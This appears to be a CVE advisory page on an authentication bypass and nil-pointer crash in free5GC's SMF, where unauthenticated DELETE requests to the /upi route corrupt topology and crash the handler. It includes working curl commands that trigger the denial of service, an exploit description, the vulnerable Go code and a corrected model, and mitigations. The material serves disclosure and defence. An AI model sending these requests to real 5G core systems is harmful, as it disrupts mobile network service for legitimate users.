free5GC SMF, UPI Auth Bypass & Nil Deref, free5gc/free5gc905 (Critical)


How the CVE works:

The SMF mounts the `/upi` route group without OAuth2 middleware, unlike the protected `/nsmf-oam` group, which returns 401. An unauthenticated attacker sends `DELETE /upi/v1/upNodesLinks/gNB1`. The handler checks `upNode.Type == UPNODE_UPF`; if false (an AN‑typed node has no UPF object), it skips the async release but still executes `UpNodeDelete(upNodeRef)` (mutating the in‑memory topology) and then calls `upNode.UPF.CancelAssociation()` on a nil pointer. The panic occurs after the topology change, leaving the SMF state corrupted. The same request can be repeated for any AN entry, causing persistent denial of user‑plane management. The vulnerability exists because the nil dereference is unconditional after the type guard, and the route group lacks authentication entirely. The official Docker image `free5gc/smf:v4.2.1` (commit 8385c00a) is affected. Proof: `curl -X DELETE http://10.100.200.6:8000/upi/v1/upNodesLinks/gNB1` returns 500, and the logs show the topology mutation before the panic. The sibling OAM endpoint returns 401, proving that authentication is missing only on UPI.
dailycve form:

Platform: free5GC SMF
Version: v4.2.1
Vulnerability: Auth bypass + nil deref
Severity: Critical
Date: 2026-03-22

Prediction: Patch expected April 2026

What Undercode Say:

```sh
# Check whether the protected OAM endpoint rejects requests without a token
curl -i http://SMF_IP:8000/nsmf-oam/v1/
# Expected: 401 Unauthorized

# Trigger the panic-DoS on AN node 'gNB1'
curl -i -X DELETE http://SMF_IP:8000/upi/v1/upNodesLinks/gNB1
# Returns 500 Internal Server Error

# View SMF logs to confirm the panic and the topology mutation
docker logs --tail 50 smf | grep -E "Deleting it|panic|nil pointer"
```

Code snippet showing the vulnerable lines (api_upi.go:94-99):

```go
if upNode.Type == smf_context.UPNODE_UPF {
	go s.Processor().ReleaseAllResourcesOfUPF(upNode.UPF)
}
upi.UpNodeDelete(upNodeRef)     // topology is mutated first
upNode.UPF.CancelAssociation() // PANIC when upNode.UPF == nil
```

Exploit:

Send unauthenticated DELETE requests to any known AN node reference (e.g., `gNB1`, `gNB2`) via the UPI endpoint. The SMF will remove that node from its in‑memory topology and crash the handler goroutine, disrupting UPF selection and PFCP path establishment for legitimate UEs. No token, session, or UE state is required. The exploit works from any network position that can reach the SMF SBI port (default 8000).

Protection from this CVE:

Upgrade to the fixed commit (free5gc/smf199) or apply the patch that adds OAuth2 middleware to the `/upi` group and moves `UpNodeDelete` after the nil check. Temporarily restrict network access to the SMF SBI port (8000) to trusted management hosts. Alternatively, disable the UPI route group by recompiling without `api_upi.go` if it is not needed.
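As an added illustration of the ordering fix described above (this is not free5GC's code or its actual patch), the handler logic the advisory quotes is modelled on a constructed in-memory topology, beside a version that validates before mutating; the type, field and function names are assumptions for this example:

```go
package main

import "fmt"

// Constructed, simplified model of the SMF user-plane topology; free5GC's
// real smf context types are richer than this.
const UPNODE_UPF = "UPF" // AN-typed nodes such as gNB1 carry another Type
type UPF struct{ associated bool }
type UPNode struct {
	Type string
	UPF  *UPF // nil for AN-typed nodes
}
type Topology map[string]*UPNode

// CancelAssociation writes through the receiver, so a nil *UPF panics here.
func (u *UPF) CancelAssociation() { u.associated = false }

// deleteLinkVulnerable keeps the ordering the advisory describes: the entry is
// removed before the unconditional UPF dereference. The panic is recovered, as
// a web framework's recovery middleware would, so the corrupted state remains.
func deleteLinkVulnerable(t Topology, ref string) (err error) {
	defer func() {
		if r := recover(); r != nil {
			err = fmt.Errorf("handler panicked after mutation: %v", r)
		}
	}()
	n, ok := t[ref]
	if !ok {
		return fmt.Errorf("no such node %q", ref)
	}
	delete(t, ref)            // topology mutated first
	n.UPF.CancelAssociation() // nil pointer for AN nodes
	return nil
}

// deleteLinkFixed validates before mutating: a node without a UPF object is
// rejected and the topology is left untouched.
func deleteLinkFixed(t Topology, ref string) error {
	n, ok := t[ref]
	if !ok {
		return fmt.Errorf("no such node %q", ref)
	}
	if n.Type != UPNODE_UPF || n.UPF == nil {
		return fmt.Errorf("node %q has no UPF association to cancel", ref)
	}
	n.UPF.CancelAssociation()
	delete(t, ref)
	return nil
}
```

Authentication on the route group is a separate control and is not modelled here; the block only shows why the guard must run before any state change.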

Impact:

  • Confidentiality: None.
  • Integrity: Attacker can delete arbitrary AN/UPF entries from SMF’s user‑plane topology, corrupting in‑memory state.
  • Availability: Repeated requests cause persistent DoS of SMF’s ability to manage user‑plane paths. The panic is recovered per request but leaves the topology mutated, requiring manual restore. An off‑path network attacker can exploit this without authentication.


Sources:

Reported By: github.com